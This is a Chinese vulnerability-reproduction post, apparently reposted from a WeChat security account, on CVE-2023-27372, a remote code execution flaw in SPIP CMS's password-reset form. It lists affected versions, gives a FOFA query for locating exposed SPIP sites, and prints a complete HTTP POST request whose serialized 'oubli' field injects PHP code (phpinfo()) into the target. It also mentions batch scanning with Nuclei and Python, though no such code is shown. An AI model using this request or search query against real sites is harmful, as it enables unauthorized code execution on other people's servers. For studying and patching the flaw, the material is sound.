免责声明
本公众号所提供的文字和信息仅供学习和研究使用,请读者自觉遵守法律法规,不得利用本公众号所提供的信息从事任何违法活动。本公众号不对读者的任何违法行为承担任何责任。
漏洞简述
SPIP是SPIP的一个用于创建 Internet 站点的免费软件。SPIP Cms v4.2.1之前版本允许通过公共区域中的表单值远程执行代码,重置密码时 protege_champ()函数没有对序列化字符串进行过滤,因为序列化处理不当,没有对序列化字符串进行过滤,从而触发命令执行漏洞。攻击者利用该漏洞可以远程执行代码。
漏洞影响
spip
< 4
.1
.8
spip
< 4
.0
.10
spip
< 3
.2
.18
漏洞复现
fofa:app="SPIP" && icon_hash="-1224668706" && "/spip.php?page=spip_pass"
POST /spip.php?page=spip_pass HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 120
Connection: close
Upgrade-Insecure-Requests: 1
page=spip_pass&formulaire_action=oubli&formulaire_action_args=0MEdEvgsiymxg%2B27bLIDEjnZOb16PsF4D1sw6PJDJLKydytv0Jn1JlktUB%2Bzt68vZDJAAvO4vWR63WI%3D&oubli=s:19:
"<?php phpinfo(); ?>"
;&nobot=
Nuclei 插件测试
编写python脚本批量测试
获取 POC
End
原文始发于微信公众号(贝雷帽SEC):【漏洞复现】SPIP RCE CVE-2023-27372 (POC)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论